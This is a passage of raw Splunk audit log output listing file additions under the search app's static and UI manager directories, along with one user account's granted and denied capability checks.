18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.399, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/120.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.395, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/12.png", isdir=0, size=399, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.392, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/119.png", isdir=0, size=393, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.389, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/118.png", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.386, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/117.png", isdir=0, size=309, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.382, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/116.png", isdir=0, size=351, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.379, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/115.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.376, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/114.png", isdir=0, size=406, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.372, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/113.png", isdir=0, size=358, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.368, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/112.png", isdir=0, size=409, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.365, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/111.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.361, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/110.png", isdir=0, size=397, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.357, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/11.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.353, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/109.png", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.350, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/108.png", isdir=0, size=325, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.346, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/107.png", isdir=0, size=313, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.343, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/106.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.336, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/105.png", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.333, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/104.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.329, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/103.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.325, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/102.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.319, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/101.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.315, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/100.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.309, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/10.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.305, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/1.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:52.300, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/0.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:50.598, user=user, action=select_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:42:50.597, user=user, action=search, info=granted REST: /search/jobs/1665078120.4] Audit:[timestamp=10-06-2022 17:42:50.477, user=user, action=edit_user, info=denied object="user" operation=edit] Audit:[timestamp=10-06-2022 17:42:50.477, user=user, action=edit_user, info=denied object="user" operation=list] Audit:[timestamp=10-06-2022 17:42:50.116, user=user, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:42:49.900, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:42:49.900, user=user, action=list_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.900, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_tokens_own, info=granted ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_tokens_own, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_sourcetypes, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_health_subset, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_health, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=restart_splunkd, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=list_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.899, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:42:49.898, user=user, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:42:43.174, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/screenshot.png", isdir=0, size=71343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:43.170, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/pdf_header.html", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:43.166, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/mod_alert_icon_list.png", isdir=0, size=3399, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:43.161, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons", isdir=1, size=24576, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:43.157, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/dashboard2.css", isdir=0, size=797, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:43.153, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/dashboard.css", isdir=0, size=296, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:43.147, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/application.css", isdir=0, size=716, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:43.142, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/appLogo.png", isdir=0, size=2052, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:43.137, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/appLogo.gif", isdir=0, size=2203, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:43.133, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/appIcon.png", isdir=0, size=864, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:43.128, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/IndexingStatusIntroText1.html", isdir=0, size=492, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:43.124, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/IndexHealthText.html", isdir=0, size=395, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:43.119, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/CpuUtilText.html", isdir=0, size=349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.995, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:42.990, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/models/internal_server.json", isdir=0, size=66080, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.987, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/models/internal_audit_logs.json", isdir=0, size=11554, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.982, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/workload_management.xml", isdir=0, size=550, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.979, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/widget-hiding.xml", isdir=0, size=2159, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.975, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/vix_provider_new.xml", isdir=0, size=66, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.971, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/vix_index_new.xml", isdir=0, size=63, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.967, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/virtual_indexes.xml", isdir=0, size=446, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.963, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/virtual_indexes.env_cloud.xml", isdir=0, size=102, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.958, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/view_indexes.xml", isdir=0, size=204, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.954, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/view_capabilities.xml", isdir=0, size=209, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.950, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/view-widgets.xml", isdir=0, size=1052, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.946, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/ui.xml", isdir=0, size=310, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.942, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/tokens.xml", isdir=0, size=549, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.938, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/tags.xml", isdir=0, size=289, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.935, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/systemsettings.xml", isdir=0, size=571, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.932, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/summarization.xml", isdir=0, size=472, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.928, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/splunkbase.xml", isdir=0, size=140, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.925, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/sourcetypes.xml", isdir=0, size=456, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.921, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/sourcetypes.env_cloud.xml", isdir=0, size=456, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.917, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/server_settings.xml", isdir=0, size=4846, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.914, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/server_settings.prod_lite.xml", isdir=0, size=3860, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.910, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/server_logger.xml", isdir=0, size=1774, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.906, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/searchprefs.xml", isdir=0, size=199, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.903, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/search_head_clustering.xml", isdir=0, size=557, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.899, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/search_distributed_peers.xml", isdir=0, size=2978, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.896, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/search_distributed_config.xml", isdir=0, size=3439, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.892, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/scheduled_views.xml", isdir=0, size=7781, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.889, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/saved_searches_advancededit.xml", isdir=0, size=184, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.885, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/saved_searches.xml", isdir=0, size=405, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.882, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/saved_eventtypes.xml", isdir=0, size=3880, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.878, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/saml.xml", isdir=0, size=54, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.872, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/rsa_mfa.xml", isdir=0, size=3507, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.868, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/reports.xml", isdir=0, size=79, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.862, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/password_management.xml", isdir=0, size=486, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.856, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/lookups.xml", isdir=0, size=346, gid=41812, 